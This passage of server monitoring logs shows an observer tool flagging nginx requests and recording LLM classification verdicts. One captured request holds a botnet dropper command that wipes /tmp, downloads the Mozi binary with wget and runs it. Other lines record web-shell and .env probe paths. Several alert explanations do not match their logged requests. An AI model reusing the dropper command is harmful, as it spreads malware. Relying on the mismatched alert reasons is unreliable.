120.86.236.157, server: _, request: "... Mar 20 12:31:59 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:31:59.662486 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T12:31:54.174491401Z 120.86.236.157 - - [20/Mar/2026:12:31:54 +0000] "54.200.221.0" "GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.... Mar 20 12:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:32:01.965131 [observer] Pipeline: processed=5012 pattern_hits=4904 llm_calls=108 llm_errors=1 learned=3 Mar 20 12:32:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:32:01.967840 [observer] Patterns: hash=4904 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=108 Mar 20 12:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:32:31.934513 [observer] Pipeline: processed=5016 pattern_hits=4908 llm_calls=108 llm_errors=1 learned=3 Mar 20 12:32:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:32:31.934537 [observer] Patterns: hash=4908 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=108 Mar 20 12:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:33:01.944548 [observer] Pipeline: processed=5018 pattern_hits=4910 llm_calls=108 llm_errors=1 learned=3 Mar 20 12:33:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:33:01.944582 [observer] Patterns: hash=4910 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=108 Mar 20 12:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:33:31.935837 [observer] Pipeline: processed=5022 pattern_hits=4914 llm_calls=108 llm_errors=1 learned=3 Mar 20 12:33:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:33:31.935862 [observer] Patterns: hash=4914 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=108 Mar 20 12:34:01 
ip-172-26-12-110 observer[1565011]: 2026/03/20 12:34:01.984004 [observer] Pipeline: processed=5024 pattern_hits=4916 llm_calls=108 llm_errors=1 learned=3 Mar 20 12:34:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:34:01.984340 [observer] Patterns: hash=4916 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=108 Mar 20 12:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:34:31.935380 [observer] Pipeline: processed=5028 pattern_hits=4920 llm_calls=108 llm_errors=1 learned=3 Mar 20 12:34:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:34:31.935405 [observer] Patterns: hash=4920 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=108 Mar 20 12:34:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:34:52.695660 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 12:34:52 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:34:52.695710 [analyzer] Source hint mismatch: LLM says "nginx", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern Mar 20 12:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:35:01.967917 [observer] Pipeline: processed=5033 pattern_hits=4923 llm_calls=110 llm_errors=1 learned=3 Mar 20 12:35:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:35:01.967952 [observer] Patterns: hash=4923 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=110 Mar 20 12:35:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:35:02.382664 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 12:35:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:35:02.382704 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern Mar 20 12:35:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:35:09.463312 [analyzer] LLM verdict for 
docker:captain-netdata-container: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 12:35:09 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:35:09.463352 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern Mar 20 12:35:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:35:17.879293 [analyzer] LLM verdict for docker:captain-netdata-container: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 20 12:35:17 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:35:17.879330 [analyzer] Source hint mismatch: LLM says "tc-qos-helper.sh", actual is "captain-netdata-container" — skipping pattern Mar 20 12:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:35:31.941336 [observer] Pipeline: processed=5037 pattern_hits=4925 llm_calls=112 llm_errors=1 learned=3 Mar 20 12:35:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:35:31.941362 [observer] Patterns: hash=4925 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=112 Mar 20 12:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:36:01.942952 [observer] Pipeline: processed=5043 pattern_hits=4931 llm_calls=112 llm_errors=1 learned=3 Mar 20 12:36:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:36:01.942978 [observer] Patterns: hash=4931 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=112 Mar 20 12:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:36:31.950389 [observer] Pipeline: processed=5045 pattern_hits=4933 llm_calls=112 llm_errors=1 learned=3 Mar 20 12:36:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:36:31.950415 [observer] Patterns: hash=4933 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=112 Mar 20 12:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:37:01.938781 [observer] Pipeline: processed=5049 pattern_hits=4937 llm_calls=112 llm_errors=1 learned=3 Mar 20 12:37:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 
12:37:01.938809 [observer] Patterns: hash=4937 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=112 Mar 20 12:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:37:31.934285 [observer] Pipeline: processed=5051 pattern_hits=4939 llm_calls=112 llm_errors=1 learned=3 Mar 20 12:37:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:37:31.934308 [observer] Patterns: hash=4939 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=112 Mar 20 12:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:38:01.958292 [observer] Pipeline: processed=5055 pattern_hits=4943 llm_calls=112 llm_errors=1 learned=3 Mar 20 12:38:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:38:01.958327 [observer] Patterns: hash=4943 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=112 Mar 20 12:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:38:31.934257 [observer] Pipeline: processed=5057 pattern_hits=4945 llm_calls=112 llm_errors=1 learned=3 Mar 20 12:38:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:38:31.934279 [observer] Patterns: hash=4945 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=112 Mar 20 12:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:39:01.957032 [observer] Pipeline: processed=5059 pattern_hits=4947 llm_calls=112 llm_errors=1 learned=3 Mar 20 12:39:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:39:01.957062 [observer] Patterns: hash=4947 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=112 Mar 20 12:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:39:31.941152 [observer] Pipeline: processed=5063 pattern_hits=4951 llm_calls=112 llm_errors=1 learned=3 Mar 20 12:39:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:39:31.941353 [observer] Patterns: hash=4951 prefix=0 regex=0 contains=0 deny=23 alert=305 suppress=0 misses=112 Mar 20 12:39:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:39:50.729875 [SUSPICIOUS] 
Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=An access attempt to a sensitive file (.env) via HTTP, which is a common probe for exposed configuration data. Line=2026-03-20T12:39:50.727739337Z 2026/03/20 12:39:50 [error] 422#422: *749903 open() "/usr/share/nginx/default/.env" failed (2: No such file or directory), client: 107.172.116.57, server: _, request: "G... Mar 20 12:39:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:39:50.729964 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-20T12:39:50.727836679Z 107.172.116.57 - - [20/Mar/2026:12:39:50 +0000] "54.200.221.0" "GET /.env HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, li... Mar 20 12:39:51 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:39:51.186960 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP 405 on POST to root from an external IP suggests potential probing or misconfigured client attempting forbidden method; notable but not definitive threat. Line=2026-03-20T12:39:51.186553908Z 107.172.116.57 - - [20/Mar/2026:12:39:51 +0000] "54.200.221.0" "POST / HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like G... 
Mar 20 12:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:40:01.936098 [observer] Pipeline: processed=5068 pattern_hits=4956 llm_calls=112 llm_errors=1 learned=3 Mar 20 12:40:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:40:01.936124 [observer] Patterns: hash=4956 prefix=0 regex=0 contains=0 deny=24 alert=307 suppress=0 misses=112 Mar 20 12:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:40:31.935502 [observer] Pipeline: processed=5072 pattern_hits=4960 llm_calls=112 llm_errors=1 learned=3 Mar 20 12:40:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:40:31.935530 [observer] Patterns: hash=4960 prefix=0 regex=0 contains=0 deny=24 alert=307 suppress=0 misses=112 Mar 20 12:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:41:01.947340 [observer] Pipeline: processed=5076 pattern_hits=4964 llm_calls=112 llm_errors=1 learned=3 Mar 20 12:41:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:41:01.947374 [observer] Patterns: hash=4964 prefix=0 regex=0 contains=0 deny=24 alert=307 suppress=0 misses=112 Mar 20 12:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:41:31.935779 [observer] Pipeline: processed=5080 pattern_hits=4968 llm_calls=112 llm_errors=1 learned=3 Mar 20 12:41:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:41:31.935813 [observer] Patterns: hash=4968 prefix=0 regex=0 contains=0 deny=24 alert=307 suppress=0 misses=112 Mar 20 12:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:42:01.940066 [observer] Pipeline: processed=5082 pattern_hits=4970 llm_calls=112 llm_errors=1 learned=3 Mar 20 12:42:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:42:01.940093 [observer] Patterns: hash=4970 prefix=0 regex=0 contains=0 deny=24 alert=307 suppress=0 misses=112 Mar 20 12:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:42:31.949907 [observer] Pipeline: processed=5084 pattern_hits=4972 llm_calls=112 llm_errors=1 learned=3 Mar 20 12:42:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:42:31.949936 [observer] 
Patterns: hash=4972 prefix=0 regex=0 contains=0 deny=24 alert=307 suppress=0 misses=112 Mar 20 12:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:43:01.946923 [observer] Pipeline: processed=5088 pattern_hits=4976 llm_calls=112 llm_errors=1 learned=3 Mar 20 12:43:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:43:01.946952 [observer] Patterns: hash=4976 prefix=0 regex=0 contains=0 deny=24 alert=307 suppress=0 misses=112 Mar 20 12:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:43:31.935439 [observer] Pipeline: processed=5090 pattern_hits=4978 llm_calls=112 llm_errors=1 learned=3 Mar 20 12:43:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:43:31.935476 [observer] Patterns: hash=4978 prefix=0 regex=0 contains=0 deny=24 alert=307 suppress=0 misses=112 Mar 20 12:44:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:44:01.999852 [observer] Pipeline: processed=5094 pattern_hits=4982 llm_calls=112 llm_errors=1 learned=3 Mar 20 12:44:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:44:02.000092 [observer] Patterns: hash=4982 prefix=0 regex=0 contains=0 deny=24 alert=307 suppress=0 misses=112 Mar 20 12:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:44:31.942597 [observer] Pipeline: processed=5096 pattern_hits=4984 llm_calls=112 llm_errors=1 learned=3 Mar 20 12:44:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:44:31.942623 [observer] Patterns: hash=4984 prefix=0 regex=0 contains=0 deny=24 alert=307 suppress=0 misses=112 Mar 20 12:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:45:01.941403 [observer] Pipeline: processed=5100 pattern_hits=4988 llm_calls=112 llm_errors=1 learned=3 Mar 20 12:45:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:45:01.941442 [observer] Patterns: hash=4988 prefix=0 regex=0 contains=0 deny=24 alert=307 suppress=0 misses=112 Mar 20 12:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:45:31.942404 [observer] Pipeline: processed=5102 pattern_hits=4990 llm_calls=112 llm_errors=1 learned=3 
Mar 20 12:45:31 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:45:31.942432 [observer] Patterns: hash=4990 prefix=0 regex=0 contains=0 deny=24 alert=307 suppress=0 misses=112 Mar 20 12:45:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:45:44.357790 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.72 action=allow pattern_type=prefix Mar 20 12:45:44 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:45:44.357849 [analyzer] Confidence 0.72 too low for pattern learning (need 0.85+) Mar 20 12:45:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:45:46.683057 [analyzer] LLM verdict for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 12:45:46 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:45:46.683093 [analyzer] Source hint mismatch: LLM says "nginx", actual is "srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp" — skipping pattern Mar 20 12:45:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:45:50.014807 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=safe confidence=0.75 action=allow pattern_type=prefix Mar 20 12:45:50 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:45:50.015107 [analyzer] Confidence 0.75 too low for pattern learning (need 0.85+) Mar 20 12:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:01.829566 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. 
Line=2026-03-20T12:46:01.828220783Z 4.204.200.32 - - [20/Mar/2026:12:46:01 +0000] "api.admin.kovicloud.com" "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:01.895333 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:01.894404420Z 4.204.200.32 - - [20/Mar/2026:12:46:01 +0000] "api.admin.kovicloud.com" "GET /wp-blogs.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:01.940674 [observer] Pipeline: processed=5112 pattern_hits=4996 llm_calls=116 llm_errors=1 learned=3 Mar 20 12:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:01.940711 [observer] Patterns: hash=4996 prefix=0 regex=0 contains=0 deny=24 alert=309 suppress=0 misses=116 Mar 20 12:46:01 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:01.988251 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:01.985918750Z 4.204.200.32 - - [20/Mar/2026:12:46:01 +0000] "api.admin.kovicloud.com" "GET //tfm.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.053534 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. 
Line=2026-03-20T12:46:02.052386113Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /8xyz.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.120768 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:02.120476158Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /RIP.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.187882 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:02.186935949Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /ioxi.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.269241 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:02.268972961Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /nc4.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.341051 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. 
Line=2026-03-20T12:46:02.340204795Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /wp-ssfc.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.408334 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:02.406863583Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /ws75.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.474965 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:02.474353458Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /ws78.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.540605 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:02.540409216Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /wp-png.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.607130 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. 
Line=2026-03-20T12:46:02.606529489Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /000.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.722416 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:02.722191258Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /w3lls.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.788389 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:02.788135957Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /ws86.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.856012 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:02.855704059Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /xwx1.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:02 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:02.933137 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. 
Line=2026-03-20T12:46:02.932886125Z 4.204.200.32 - - [20/Mar/2026:12:46:02 +0000] "api.admin.kovicloud.com" "GET /ggb.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.010199 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.009883588Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /xff.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.078218 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.077905655Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /wwx.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.153369 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.153189526Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /term.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.220949 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. 
Line=2026-03-20T12:46:03.220681983Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /ws77.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.291383 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.290055299Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /gifclass.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.367231 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.366951873Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /8.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.436099 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.435779042Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /155.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.506897 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. 
Line=2026-03-20T12:46:03.506666540Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /mh.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.572754 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.572462858Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /222.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.640647 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.640296287Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /hehe.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.706915 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=GET request to wp-admin/install.php with 404 from an external IP; pattern is typical of Wordpress install probes or vulnerability scans. Line=2026-03-20T12:46:03.706632901Z 4.204.200.32 - - [20/Mar/2026:12:46:03 +0000] "api.admin.kovicloud.com" "GET /tool.php HTTP/1.1" 404 146 "-" "-" "-" Mar 20 12:46:03 ip-172-26-12-110 observer[1565011]: 2026/03/20 12:46:03.772964 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo 